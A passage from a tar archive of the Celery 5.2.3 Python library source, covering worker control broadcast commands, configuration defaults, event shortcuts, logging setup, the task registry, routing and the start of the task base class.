(float): New soft time limit (in seconds). hard (float): New hard time limit (in seconds). **kwargs (Any): arguments passed on to :meth:`broadcast`. """ return self.broadcast( 'time_limit', arguments={ 'task_name': task_name, 'hard': hard, 'soft': soft, }, destination=destination, **kwargs) def enable_events(self, destination=None, **kwargs): """Tell all (or specific) workers to enable events. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'enable_events', arguments={}, destination=destination, **kwargs) def disable_events(self, destination=None, **kwargs): """Tell all (or specific) workers to disable events. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'disable_events', arguments={}, destination=destination, **kwargs) def pool_grow(self, n=1, destination=None, **kwargs): """Tell all (or specific) workers to grow the pool by ``n``. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'pool_grow', arguments={'n': n}, destination=destination, **kwargs) def pool_shrink(self, n=1, destination=None, **kwargs): """Tell all (or specific) workers to shrink the pool by ``n``. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'pool_shrink', arguments={'n': n}, destination=destination, **kwargs) def autoscale(self, max, min, destination=None, **kwargs): """Change worker(s) autoscale setting. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'autoscale', arguments={'max': max, 'min': min}, destination=destination, **kwargs) def shutdown(self, destination=None, **kwargs): """Shutdown worker(s). See Also: Supports the same arguments as :meth:`broadcast` """ return self.broadcast( 'shutdown', arguments={}, destination=destination, **kwargs) def pool_restart(self, modules=None, reload=False, reloader=None, destination=None, **kwargs): """Restart the execution pools of all or specific workers. Keyword Arguments: modules (Sequence[str]): List of modules to reload. reload (bool): Flag to enable module reloading. Default is False. reloader (Any): Function to reload a module. destination (Sequence[str]): List of worker names to send this command to. See Also: Supports the same arguments as :meth:`broadcast` """ return self.broadcast( 'pool_restart', arguments={ 'modules': modules, 'reload': reload, 'reloader': reloader, }, destination=destination, **kwargs) def heartbeat(self, destination=None, **kwargs): """Tell worker(s) to send a heartbeat immediately. See Also: Supports the same arguments as :meth:`broadcast` """ return self.broadcast( 'heartbeat', arguments={}, destination=destination, **kwargs) def broadcast(self, command, arguments=None, destination=None, connection=None, reply=False, timeout=1.0, limit=None, callback=None, channel=None, pattern=None, matcher=None, **extra_kwargs): """Broadcast a control command to the celery workers. Arguments: command (str): Name of command to send. arguments (Dict): Keyword arguments for the command. destination (List): If set, a list of the hosts to send the command to, when empty broadcast to all workers. connection (kombu.Connection): Custom broker connection to use, if not set, a connection will be acquired from the pool. reply (bool): Wait for and return the reply. timeout (float): Timeout in seconds to wait for the reply. limit (int): Limit number of replies. callback (Callable): Callback called immediately for each reply received. pattern (str): Custom pattern string to match matcher (Callable): Custom matcher to run the pattern to match """ with self.app.connection_or_acquire(connection) as conn: arguments = dict(arguments or {}, **extra_kwargs) if pattern and matcher: # tests pass easier without requiring pattern/matcher to # always be sent in return self.mailbox(conn)._broadcast( command, arguments, destination, reply, timeout, limit, callback, channel=channel, pattern=pattern, matcher=matcher, ) else: return self.mailbox(conn)._broadcast( command, arguments, destination, reply, timeout, limit, callback, channel=channel, ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/defaults.py0000664000175000017500000003453700000000000017135 0ustar00asifasif00000000000000"""Configuration introspection and defaults.""" from collections import deque, namedtuple from datetime import timedelta from celery.utils.functional import memoize from celery.utils.serialization import strtobool __all__ = ('Option', 'NAMESPACES', 'flatten', 'find') DEFAULT_POOL = 'prefork' DEFAULT_ACCEPT_CONTENT = ['json'] DEFAULT_PROCESS_LOG_FMT = """ [%(asctime)s: %(levelname)s/%(processName)s] %(message)s """.strip() DEFAULT_TASK_LOG_FMT = """[%(asctime)s: %(levelname)s/%(processName)s] \ %(task_name)s[%(task_id)s]: %(message)s""" DEFAULT_SECURITY_DIGEST = 'sha256' OLD_NS = {'celery_{0}'} OLD_NS_BEAT = {'celerybeat_{0}'} OLD_NS_WORKER = {'celeryd_{0}'} searchresult = namedtuple('searchresult', ('namespace', 'key', 'type')) def Namespace(__old__=None, **options): if __old__ is not None: for key, opt in options.items(): if not opt.old: opt.old = {o.format(key) for o in __old__} return options def old_ns(ns): return {f'{ns}_{{0}}'} class Option: """Describes a Celery configuration option.""" alt = None deprecate_by = None remove_by = None old = set() typemap = {'string': str, 'int': int, 'float': float, 'any': lambda v: v, 'bool': strtobool, 'dict': dict, 'tuple': tuple} def __init__(self, default=None, *args, **kwargs): self.default = default self.type = kwargs.get('type') or 'string' for attr, value in kwargs.items(): setattr(self, attr, value) def to_python(self, value): return self.typemap[self.type](value) def __repr__(self): return '{} default->{!r}>'.format(self.type, self.default) NAMESPACES = Namespace( accept_content=Option(DEFAULT_ACCEPT_CONTENT, type='list', old=OLD_NS), result_accept_content=Option(None, type='list'), enable_utc=Option(True, type='bool'), imports=Option((), type='tuple', old=OLD_NS), include=Option((), type='tuple', old=OLD_NS), timezone=Option(type='string', old=OLD_NS), beat=Namespace( __old__=OLD_NS_BEAT, max_loop_interval=Option(0, type='float'), schedule=Option({}, type='dict'), scheduler=Option('celery.beat:PersistentScheduler'), schedule_filename=Option('celerybeat-schedule'), sync_every=Option(0, type='int'), ), broker=Namespace( url=Option(None, type='string'), read_url=Option(None, type='string'), write_url=Option(None, type='string'), transport=Option(type='string'), transport_options=Option({}, type='dict'), connection_timeout=Option(4, type='float'), connection_retry=Option(True, type='bool'), connection_max_retries=Option(100, type='int'), failover_strategy=Option(None, type='string'), heartbeat=Option(120, type='int'), heartbeat_checkrate=Option(3.0, type='int'), login_method=Option(None, type='string'), pool_limit=Option(10, type='int'), use_ssl=Option(False, type='bool'), host=Option(type='string'), port=Option(type='int'), user=Option(type='string'), password=Option(type='string'), vhost=Option(type='string'), ), cache=Namespace( __old__=old_ns('celery_cache'), backend=Option(), backend_options=Option({}, type='dict'), ), cassandra=Namespace( entry_ttl=Option(type='float'), keyspace=Option(type='string'), port=Option(type='string'), read_consistency=Option(type='string'), servers=Option(type='list'), table=Option(type='string'), write_consistency=Option(type='string'), auth_provider=Option(type='string'), auth_kwargs=Option(type='string'), options=Option({}, type='dict'), ), s3=Namespace( access_key_id=Option(type='string'), secret_access_key=Option(type='string'), bucket=Option(type='string'), base_path=Option(type='string'), endpoint_url=Option(type='string'), region=Option(type='string'), ), azureblockblob=Namespace( container_name=Option('celery', type='string'), retry_initial_backoff_sec=Option(2, type='int'), retry_increment_base=Option(2, type='int'), retry_max_attempts=Option(3, type='int'), base_path=Option('', type='string'), connection_timeout=Option(20, type='int'), read_timeout=Option(120, type='int'), ), control=Namespace( queue_ttl=Option(300.0, type='float'), queue_expires=Option(10.0, type='float'), exchange=Option('celery', type='string'), ), couchbase=Namespace( __old__=old_ns('celery_couchbase'), backend_settings=Option(None, type='dict'), ), arangodb=Namespace( __old__=old_ns('celery_arangodb'), backend_settings=Option(None, type='dict') ), mongodb=Namespace( __old__=old_ns('celery_mongodb'), backend_settings=Option(type='dict'), ), cosmosdbsql=Namespace( database_name=Option('celerydb', type='string'), collection_name=Option('celerycol', type='string'), consistency_level=Option('Session', type='string'), max_retry_attempts=Option(9, type='int'), max_retry_wait_time=Option(30, type='int'), ), event=Namespace( __old__=old_ns('celery_event'), queue_expires=Option(60.0, type='float'), queue_ttl=Option(5.0, type='float'), queue_prefix=Option('celeryev'), serializer=Option('json'), exchange=Option('celeryev', type='string'), ), redis=Namespace( __old__=old_ns('celery_redis'), backend_use_ssl=Option(type='dict'), db=Option(type='int'), host=Option(type='string'), max_connections=Option(type='int'), username=Option(type='string'), password=Option(type='string'), port=Option(type='int'), socket_timeout=Option(120.0, type='float'), socket_connect_timeout=Option(None, type='float'), retry_on_timeout=Option(False, type='bool'), socket_keepalive=Option(False, type='bool'), ), result=Namespace( __old__=old_ns('celery_result'), backend=Option(type='string'), cache_max=Option( -1, type='int', old={'celery_max_cached_results'}, ), compression=Option(type='str'), exchange=Option('celeryresults'), exchange_type=Option('direct'), expires=Option( timedelta(days=1), type='float', old={'celery_task_result_expires'}, ), persistent=Option(None, type='bool'), extended=Option(False, type='bool'), serializer=Option('json'), backend_transport_options=Option({}, type='dict'), chord_retry_interval=Option(1.0, type='float'), chord_join_timeout=Option(3.0, type='float'), backend_max_sleep_between_retries_ms=Option(10000, type='int'), backend_max_retries=Option(float("inf"), type='float'), backend_base_sleep_between_retries_ms=Option(10, type='int'), backend_always_retry=Option(False, type='bool'), ), elasticsearch=Namespace( __old__=old_ns('celery_elasticsearch'), retry_on_timeout=Option(type='bool'), max_retries=Option(type='int'), timeout=Option(type='float'), save_meta_as_text=Option(True, type='bool'), ), security=Namespace( __old__=old_ns('celery_security'), certificate=Option(type='string'), cert_store=Option(type='string'), key=Option(type='string'), digest=Option(DEFAULT_SECURITY_DIGEST, type='string'), ), database=Namespace( url=Option(old={'celery_result_dburi'}), engine_options=Option( type='dict', old={'celery_result_engine_options'}, ), short_lived_sessions=Option( False, type='bool', old={'celery_result_db_short_lived_sessions'}, ), table_schemas=Option(type='dict'), table_names=Option(type='dict', old={'celery_result_db_tablenames'}), ), task=Namespace( __old__=OLD_NS, acks_late=Option(False, type='bool'), acks_on_failure_or_timeout=Option(True, type='bool'), always_eager=Option(False, type='bool'), annotations=Option(type='any'), compression=Option(type='string', old={'celery_message_compression'}), create_missing_queues=Option(True, type='bool'), inherit_parent_priority=Option(False, type='bool'), default_delivery_mode=Option(2, type='string'), default_queue=Option('celery'), default_exchange=Option(None, type='string'), # taken from queue default_exchange_type=Option('direct'), default_routing_key=Option(None, type='string'), # taken from queue default_rate_limit=Option(type='string'), default_priority=Option(None, type='string'), eager_propagates=Option( False, type='bool', old={'celery_eager_propagates_exceptions'}, ), ignore_result=Option(False, type='bool'), store_eager_result=Option(False, type='bool'), protocol=Option(2, type='int', old={'celery_task_protocol'}), publish_retry=Option( True, type='bool', old={'celery_task_publish_retry'}, ), publish_retry_policy=Option( {'max_retries': 3, 'interval_start': 0, 'interval_max': 1, 'interval_step': 0.2}, type='dict', old={'celery_task_publish_retry_policy'}, ), queues=Option(type='dict'), queue_max_priority=Option(None, type='int'), reject_on_worker_lost=Option(type='bool'), remote_tracebacks=Option(False, type='bool'), routes=Option(type='any'), send_sent_event=Option( False, type='bool', old={'celery_send_task_sent_event'}, ), serializer=Option('json', old={'celery_task_serializer'}), soft_time_limit=Option( type='float', old={'celeryd_task_soft_time_limit'}, ), time_limit=Option( type='float', old={'celeryd_task_time_limit'}, ), store_errors_even_if_ignored=Option(False, type='bool'), track_started=Option(False, type='bool'), ), worker=Namespace( __old__=OLD_NS_WORKER, agent=Option(None, type='string'), autoscaler=Option('celery.worker.autoscale:Autoscaler'), cancel_long_running_tasks_on_connection_loss=Option( False, type='bool' ), concurrency=Option(None, type='int'), consumer=Option('celery.worker.consumer:Consumer', type='string'), direct=Option(False, type='bool', old={'celery_worker_direct'}), disable_rate_limits=Option( False, type='bool', old={'celery_disable_rate_limits'}, ), deduplicate_successful_tasks=Option( False, type='bool' ), enable_remote_control=Option( True, type='bool', old={'celery_enable_remote_control'}, ), hijack_root_logger=Option(True, type='bool'), log_color=Option(type='bool'), log_format=Option(DEFAULT_PROCESS_LOG_FMT), lost_wait=Option(10.0, type='float', old={'celeryd_worker_lost_wait'}), max_memory_per_child=Option(type='int'), max_tasks_per_child=Option(type='int'), pool=Option(DEFAULT_POOL), pool_putlocks=Option(True, type='bool'), pool_restarts=Option(False, type='bool'), proc_alive_timeout=Option(4.0, type='float'), prefetch_multiplier=Option(4, type='int'), redirect_stdouts=Option( True, type='bool', old={'celery_redirect_stdouts'}, ), redirect_stdouts_level=Option( 'WARNING', old={'celery_redirect_stdouts_level'}, ), send_task_events=Option( False, type='bool', old={'celery_send_events'}, ), state_db=Option(), task_log_format=Option(DEFAULT_TASK_LOG_FMT), timer=Option(type='string'), timer_precision=Option(1.0, type='float'), ), ) def _flatten_keys(ns, key, opt): return [(ns + key, opt)] def _to_compat(ns, key, opt): if opt.old: return [ (oldkey.format(key).upper(), ns + key, opt) for oldkey in opt.old ] return [((ns + key).upper(), ns + key, opt)] def flatten(d, root='', keyfilter=_flatten_keys): """Flatten settings.""" stack = deque([(root, d)]) while stack: ns, options = stack.popleft() for key, opt in options.items(): if isinstance(opt, dict): stack.append((ns + key + '_', opt)) else: yield from keyfilter(ns, key, opt) DEFAULTS = { key: opt.default for key, opt in flatten(NAMESPACES) } __compat = list(flatten(NAMESPACES, keyfilter=_to_compat)) _OLD_DEFAULTS = {old_key: opt.default for old_key, _, opt in __compat} _TO_OLD_KEY = {new_key: old_key for old_key, new_key, _ in __compat} _TO_NEW_KEY = {old_key: new_key for old_key, new_key, _ in __compat} __compat = None SETTING_KEYS = set(DEFAULTS.keys()) _OLD_SETTING_KEYS = set(_TO_NEW_KEY.keys()) def find_deprecated_settings(source): # pragma: no cover from celery.utils import deprecated for name, opt in flatten(NAMESPACES): if (opt.deprecate_by or opt.remove_by) and getattr(source, name, None): deprecated.warn(description=f'The {name!r} setting', deprecation=opt.deprecate_by, removal=opt.remove_by, alternative=f'Use the {opt.alt} instead') return source @memoize(maxsize=None) def find(name, namespace='celery'): """Find setting by name.""" # - Try specified name-space first. namespace = namespace.lower() try: return searchresult( namespace, name.lower(), NAMESPACES[namespace][name.lower()], ) except KeyError: # - Try all the other namespaces. for ns, opts in NAMESPACES.items(): if ns.lower() == name.lower(): return searchresult(None, ns, opts) elif isinstance(opts, dict): try: return searchresult(ns, name.lower(), opts[name.lower()]) except KeyError: pass # - See if name is a qualname last. return searchresult(None, name.lower(), DEFAULTS[name.lower()]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/events.py0000664000175000017500000000245600000000000016625 0ustar00asifasif00000000000000"""Implementation for the app.events shortcuts.""" from contextlib import contextmanager from kombu.utils.objects import cached_property class Events: """Implements app.events.""" receiver_cls = 'celery.events.receiver:EventReceiver' dispatcher_cls = 'celery.events.dispatcher:EventDispatcher' state_cls = 'celery.events.state:State' def __init__(self, app=None): self.app = app @cached_property def Receiver(self): return self.app.subclass_with_self( self.receiver_cls, reverse='events.Receiver') @cached_property def Dispatcher(self): return self.app.subclass_with_self( self.dispatcher_cls, reverse='events.Dispatcher') @cached_property def State(self): return self.app.subclass_with_self( self.state_cls, reverse='events.State') @contextmanager def default_dispatcher(self, hostname=None, enabled=True, buffer_while_offline=False): with self.app.amqp.producer_pool.acquire(block=True) as prod: # pylint: disable=too-many-function-args # This is a property pylint... with self.Dispatcher(prod.connection, hostname, enabled, prod.channel, buffer_while_offline) as d: yield d ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/log.py0000664000175000017500000002167400000000000016105 0ustar00asifasif00000000000000"""Logging configuration. The Celery instances logging section: ``Celery.log``. Sets up logging for the worker and other programs, redirects standard outs, colors log output, patches logging related compatibility fixes, and so on. """ import logging import os import sys import warnings from logging.handlers import WatchedFileHandler from kombu.utils.encoding import set_default_encoding_file from celery import signals from celery._state import get_current_task from celery.exceptions import CDeprecationWarning, CPendingDeprecationWarning from celery.local import class_property from celery.platforms import isatty from celery.utils.log import (ColorFormatter, LoggingProxy, get_logger, get_multiprocessing_logger, mlevel, reset_multiprocessing_logger) from celery.utils.nodenames import node_format from celery.utils.term import colored __all__ = ('TaskFormatter', 'Logging') MP_LOG = os.environ.get('MP_LOG', False) class TaskFormatter(ColorFormatter): """Formatter for tasks, adding the task name and id.""" def format(self, record): task = get_current_task() if task and task.request: record.__dict__.update(task_id=task.request.id, task_name=task.name) else: record.__dict__.setdefault('task_name', '???') record.__dict__.setdefault('task_id', '???') return super().format(record) class Logging: """Application logging setup (app.log).""" #: The logging subsystem is only configured once per process. #: setup_logging_subsystem sets this flag, and subsequent calls #: will do nothing. _setup = False def __init__(self, app): self.app = app self.loglevel = mlevel(logging.WARN) self.format = self.app.conf.worker_log_format self.task_format = self.app.conf.worker_task_log_format self.colorize = self.app.conf.worker_log_color def setup(self, loglevel=None, logfile=None, redirect_stdouts=False, redirect_level='WARNING', colorize=None, hostname=None): loglevel = mlevel(loglevel) handled = self.setup_logging_subsystem( loglevel, logfile, colorize=colorize, hostname=hostname, ) if not handled: if redirect_stdouts: self.redirect_stdouts(redirect_level) os.environ.update( CELERY_LOG_LEVEL=str(loglevel) if loglevel else '', CELERY_LOG_FILE=str(logfile) if logfile else '', ) warnings.filterwarnings('always', category=CDeprecationWarning) warnings.filterwarnings('always', category=CPendingDeprecationWarning) logging.captureWarnings(True) return handled def redirect_stdouts(self, loglevel=None, name='celery.redirected'): self.redirect_stdouts_to_logger( get_logger(name), loglevel=loglevel ) os.environ.update( CELERY_LOG_REDIRECT='1', CELERY_LOG_REDIRECT_LEVEL=str(loglevel or ''), ) def setup_logging_subsystem(self, loglevel=None, logfile=None, format=None, colorize=None, hostname=None, **kwargs): if self.already_setup: return if logfile and hostname: logfile = node_format(logfile, hostname) Logging._setup = True loglevel = mlevel(loglevel or self.loglevel) format = format or self.format colorize = self.supports_color(colorize, logfile) reset_multiprocessing_logger() receivers = signals.setup_logging.send( sender=None, loglevel=loglevel, logfile=logfile, format=format, colorize=colorize, ) if not receivers: root = logging.getLogger() if self.app.conf.worker_hijack_root_logger: root.handlers = [] get_logger('celery').handlers = [] get_logger('celery.task').handlers = [] get_logger('celery.redirected').handlers = [] # Configure root logger self._configure_logger( root, logfile, loglevel, format, colorize, **kwargs ) # Configure the multiprocessing logger self._configure_logger( get_multiprocessing_logger(), logfile, loglevel if MP_LOG else logging.ERROR, format, colorize, **kwargs ) signals.after_setup_logger.send( sender=None, logger=root, loglevel=loglevel, logfile=logfile, format=format, colorize=colorize, ) # then setup the root task logger. self.setup_task_loggers(loglevel, logfile, colorize=colorize) try: stream = logging.getLogger().handlers[0].stream except (AttributeError, IndexError): pass else: set_default_encoding_file(stream) # This is a hack for multiprocessing's fork+exec, so that # logging before Process.run works. logfile_name = logfile if isinstance(logfile, str) else '' os.environ.update(_MP_FORK_LOGLEVEL_=str(loglevel), _MP_FORK_LOGFILE_=logfile_name, _MP_FORK_LOGFORMAT_=format) return receivers def _configure_logger(self, logger, logfile, loglevel, format, colorize, **kwargs): if logger is not None: self.setup_handlers(logger, logfile, format, colorize, **kwargs) if loglevel: logger.setLevel(loglevel) def setup_task_loggers(self, loglevel=None, logfile=None, format=None, colorize=None, propagate=False, **kwargs): """Setup the task logger. If `logfile` is not specified, then `sys.stderr` is used. Will return the base task logger object. """ loglevel = mlevel(loglevel or self.loglevel) format = format or self.task_format colorize = self.supports_color(colorize, logfile) logger = self.setup_handlers( get_logger('celery.task'), logfile, format, colorize, formatter=TaskFormatter, **kwargs ) logger.setLevel(loglevel) # this is an int for some reason, better to not question why. logger.propagate = int(propagate) signals.after_setup_task_logger.send( sender=None, logger=logger, loglevel=loglevel, logfile=logfile, format=format, colorize=colorize, ) return logger def redirect_stdouts_to_logger(self, logger, loglevel=None, stdout=True, stderr=True): """Redirect :class:`sys.stdout` and :class:`sys.stderr` to logger. Arguments: logger (logging.Logger): Logger instance to redirect to. loglevel (int, str): The loglevel redirected message will be logged as. """ proxy = LoggingProxy(logger, loglevel) if stdout: sys.stdout = proxy if stderr: sys.stderr = proxy return proxy def supports_color(self, colorize=None, logfile=None): colorize = self.colorize if colorize is None else colorize if self.app.IS_WINDOWS: # Windows does not support ANSI color codes. return False if colorize or colorize is None: # Only use color if there's no active log file # and stderr is an actual terminal. return logfile is None and isatty(sys.stderr) return colorize def colored(self, logfile=None, enabled=None): return colored(enabled=self.supports_color(enabled, logfile)) def setup_handlers(self, logger, logfile, format, colorize, formatter=ColorFormatter, **kwargs): if self._is_configured(logger): return logger handler = self._detect_handler(logfile) handler.setFormatter(formatter(format, use_color=colorize)) logger.addHandler(handler) return logger def _detect_handler(self, logfile=None): """Create handler from filename, an open stream or `None` (stderr).""" logfile = sys.__stderr__ if logfile is None else logfile if hasattr(logfile, 'write'): return logging.StreamHandler(logfile) return WatchedFileHandler(logfile, encoding='utf-8') def _has_handler(self, logger): return any( not isinstance(h, logging.NullHandler) for h in logger.handlers or [] ) def _is_configured(self, logger): return self._has_handler(logger) and not getattr( logger, '_rudimentary_setup', False) def get_default_logger(self, name='celery', **kwargs): return get_logger(name) @class_property def already_setup(self): return self._setup @already_setup.setter def already_setup(self, was_setup): self._setup = was_setup ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/registry.py0000664000175000017500000000372100000000000017165 0ustar00asifasif00000000000000"""Registry of available tasks.""" import inspect from importlib import import_module from celery._state import get_current_app from celery.app.autoretry import add_autoretry_behaviour from celery.exceptions import InvalidTaskError, NotRegistered __all__ = ('TaskRegistry',) class TaskRegistry(dict): """Map of registered tasks.""" NotRegistered = NotRegistered def __missing__(self, key): raise self.NotRegistered(key) def register(self, task): """Register a task in the task registry. The task will be automatically instantiated if not already an instance. Name must be configured prior to registration. """ if task.name is None: raise InvalidTaskError( 'Task class {!r} must specify .name attribute'.format( type(task).__name__)) task = inspect.isclass(task) and task() or task add_autoretry_behaviour(task) self[task.name] = task def unregister(self, name): """Unregister task by name. Arguments: name (str): name of the task to unregister, or a :class:`celery.app.task.Task` with a valid `name` attribute. Raises: celery.exceptions.NotRegistered: if the task is not registered. """ try: self.pop(getattr(name, 'name', name)) except KeyError: raise self.NotRegistered(name) # -- these methods are irrelevant now and will be removed in 4.0 def regular(self): return self.filter_types('regular') def periodic(self): return self.filter_types('periodic') def filter_types(self, type): return {name: task for name, task in self.items() if getattr(task, 'type', 'regular') == type} def _unpickle_task(name): return get_current_app().tasks[name] def _unpickle_task_v2(name, module=None): if module: import_module(module) return get_current_app().tasks[name] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/routes.py0000664000175000017500000001065700000000000016644 0ustar00asifasif00000000000000"""Task Routing. Contains utilities for working with task routers, (:setting:`task_routes`). """ import fnmatch import re from collections import OrderedDict from collections.abc import Mapping from kombu import Queue from celery.exceptions import QueueNotFound from celery.utils.collections import lpmerge from celery.utils.functional import maybe_evaluate, mlazy from celery.utils.imports import symbol_by_name try: Pattern = re._pattern_type except AttributeError: # pragma: no cover # for support Python 3.7 Pattern = re.Pattern __all__ = ('MapRoute', 'Router', 'prepare') class MapRoute: """Creates a router out of a :class:`dict`.""" def __init__(self, map): map = map.items() if isinstance(map, Mapping) else map self.map = {} self.patterns = OrderedDict() for k, v in map: if isinstance(k, Pattern): self.patterns[k] = v elif '*' in k: self.patterns[re.compile(fnmatch.translate(k))] = v else: self.map[k] = v def __call__(self, name, *args, **kwargs): try: return dict(self.map[name]) except KeyError: pass except ValueError: return {'queue': self.map[name]} for regex, route in self.patterns.items(): if regex.match(name): try: return dict(route) except ValueError: return {'queue': route} class Router: """Route tasks based on the :setting:`task_routes` setting.""" def __init__(self, routes=None, queues=None, create_missing=False, app=None): self.app = app self.queues = {} if queues is None else queues self.routes = [] if routes is None else routes self.create_missing = create_missing def route(self, options, name, args=(), kwargs=None, task_type=None): kwargs = {} if not kwargs else kwargs options = self.expand_destination(options) # expands 'queue' if self.routes: route = self.lookup_route(name, args, kwargs, options, task_type) if route: # expands 'queue' in route. return lpmerge(self.expand_destination(route), options) if 'queue' not in options: options = lpmerge(self.expand_destination( self.app.conf.task_default_queue), options) return options def expand_destination(self, route): # Route can be a queue name: convenient for direct exchanges. if isinstance(route, str): queue, route = route, {} else: # can use defaults from configured queue, but override specific # things (like the routing_key): great for topic exchanges. queue = route.pop('queue', None) if queue: if isinstance(queue, Queue): route['queue'] = queue else: try: route['queue'] = self.queues[queue] except KeyError: raise QueueNotFound( f'Queue {queue!r} missing from task_queues') return route def lookup_route(self, name, args=None, kwargs=None, options=None, task_type=None): query = self.query_router for router in self.routes: route = query(router, name, args, kwargs, options, task_type) if route is not None: return route def query_router(self, router, task, args, kwargs, options, task_type): router = maybe_evaluate(router) if hasattr(router, 'route_for_task'): # pre 4.0 router class return router.route_for_task(task, args, kwargs) return router(task, args, kwargs, options, task=task_type) def expand_router_string(router): router = symbol_by_name(router) if hasattr(router, 'route_for_task'): # need to instantiate pre 4.0 router classes router = router() return router def prepare(routes): """Expand the :setting:`task_routes` setting.""" def expand_route(route): if isinstance(route, (Mapping, list, tuple)): return MapRoute(route) if isinstance(route, str): return mlazy(expand_router_string, route) return route if routes is None: return () if not isinstance(routes, (list, tuple)): routes = (routes,) return [expand_route(route) for route in routes] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/task.py0000664000175000017500000012120400000000000016254 0ustar00asifasif00000000000000"""Task implementation: request context and the task base class.""" import sys from billiard.einfo import ExceptionInfo from kombu import serialization from kombu.exceptions import OperationalError from kombu.utils.uuid import uuid from celery import current_app, states from celery._state import _task_stack from celery.canvas import _chain, group, signature from celery.exceptions import (Ignore, ImproperlyConfigured, MaxRetriesExceededError, Reject, Retry) from celery.local import class_property from celery.result import EagerResult, denied_join_result from celery.utils import abstract from celery.utils.functional import mattrgetter, maybe_list from celery.utils.imports import instantiate from celery.utils.nodenames import gethostname from celery.utils.serialization import raise_with_context from .annotations import resolve_all as resolve_all_annotations from .registry import _unpickle_task_v2 from .utils import appstr __all__ = ('Context', 'Task') #: extracts attributes related to publishing a message from an object. extract_exec_options = mattrgetter( 'queue', 'routing_key', 'exchange', 'priority', 'expires', 'serializer', 'delivery_mode', 'compression', 'time_limit', 'soft_time_limit', 'immediate', 'mandatory', # imm+man is deprecated ) # We take __repr__ very seriously around here ;) R_BOUND_TASK = '' R_UNBOUND_TASK = '' R_INSTANCE = '<@task: {0.name} of {app}{flags}>' #: Here for backwards compatibility as tasks no longer use a custom meta-class. TaskType = type def _strflags(flags, default=''): if flags: return ' ({})'.format(', '.join(flags)) return default def _reprtask(task, fmt=None, flags=None): flags = list(flags) if flags is not None else [] flags.append('v2 compatible') if task.__v2_compat__ else None if not fmt: fmt = R_BOUND_TASK if task._app else R_UNBOUND_TASK return fmt.format( task, flags=_strflags(flags), app=appstr(task._app) if task._app else None, ) class Context: """Task request variables (Task.request).""" _children = None # see property _protected = 0 args = None callbacks = None called_directly = True chain = None chord = None correlation_id = None delivery_info = None errbacks = None eta = None expires = None group = None group_index = None headers = None hostname = None id = None ignore_result = False is_eager = False kwargs = None logfile = None loglevel = None origin = None parent_id = None properties = None retries = 0 reply_to = None replaced_task_nesting = 0 root_id = None shadow = None taskset = None # compat alias to group timelimit = None utc = None def __init__(self, *args, **kwargs): self.update(*args, **kwargs) def update(self, *args, **kwargs): return self.__dict__.update(*args, **kwargs) def clear(self): return self.__dict__.clear() def get(self, key, default=None): return getattr(self, key, default) def __repr__(self): return f'' def as_execution_options(self): limit_hard, limit_soft = self.timelimit or (None, None) return { 'task_id': self.id, 'root_id': self.root_id, 'parent_id': self.parent_id, 'group_id': self.group, 'group_index': self.group_index, 'shadow': self.shadow, 'chord': self.chord, 'chain': self.chain, 'link': self.callbacks, 'link_error': self.errbacks, 'expires': self.expires, 'soft_time_limit': limit_soft, 'time_limit': limit_hard, 'headers': self.headers, 'retries': self.retries, 'reply_to': self.reply_to, 'replaced_task_nesting': self.replaced_task_nesting, 'origin': self.origin, } @property def children(self): # children must be an empty list for every thread if self._children is None: self._children = [] return self._children @abstract.CallableTask.register class Task: """Task base class. Note: When called tasks apply the :meth:`run` method. This method must be defined by all tasks (that is unless the :meth:`__call__` method is overridden). """ __trace__ = None __v2_compat__ = False # set by old base in celery.task.base MaxRetriesExceededError = MaxRetriesExceededError OperationalError = OperationalError #: Execution strategy used, or the qualified name of one. Strategy = 'celery.worker.strategy:default' #: Request class used, or the qualified name of one. Request = 'celery.worker.request:Request' #: The application instance associated with this task class. _app = None #: Name of the task. name = None #: Enable argument checking. #: You can set this to false if you don't want the signature to be #: checked when calling the task. #: Defaults to :attr:`app.strict_typing <@Celery.strict_typing>`. typing = None #: Maximum number of retries before giving up. If set to :const:`None`, #: it will **never** stop retrying. max_retries = 3 #: Default time in seconds before a retry of the task should be #: executed. 3 minutes by default. default_retry_delay = 3 * 60 #: Rate limit for this task type. Examples: :const:`None` (no rate #: limit), `'100/s'` (hundred tasks a second), `'100/m'` (hundred tasks #: a minute),`'100/h'` (hundred tasks an hour) rate_limit = None #: If enabled the worker won't store task state and return values #: for this task. Defaults to the :setting:`task_ignore_result` #: setting. ignore_result = None #: If enabled the request will keep track of subtasks started by #: this task, and this information will be sent with the result #: (``result.children``). trail = True #: If enabled the worker will send monitoring events related to #: this task (but only if the worker is configured to send #: task related events). #: Note that this has no effect on the task-failure event case #: where a task is not registered (as it will have no task class #: to check this flag). send_events = True #: When enabled errors will be stored even if the task is otherwise #: configured to ignore results. store_errors_even_if_ignored = None #: The name of a serializer that are registered with #: :mod:`kombu.serialization.registry`. Default is `'json'`. serializer = None #: Hard time limit. #: Defaults to the :setting:`task_time_limit` setting. time_limit = None #: Soft time limit. #: Defaults to the :setting:`task_soft_time_limit` setting. soft_time_limit = None #: The result store backend used for this task. backend = None #: If enabled the task will report its status as 'started' when the task #: is executed by a worker. Disabled by default as the normal behavior #: is to not report that level of granularity. Tasks are either pending, #: finished, or waiting to be retried. #: #: Having a 'started' status can be useful for when there are long #: running tasks and there's a need to report what task is currently #: running. #: #: The application default can be overridden using the #: :setting:`task_track_started` setting. track_started = None #: When enabled messages for this task will be acknowledged **after** #: the task has been executed, and not *just before* (the #: default behavior). #: #: Please note that this means the task may be executed twice if the #: worker crashes mid execution. #: #: The application default can be overridden with the #: :setting:`task_acks_late` setting. acks_late = None #: When enabled messages for this task will be acknowledged even if it #: 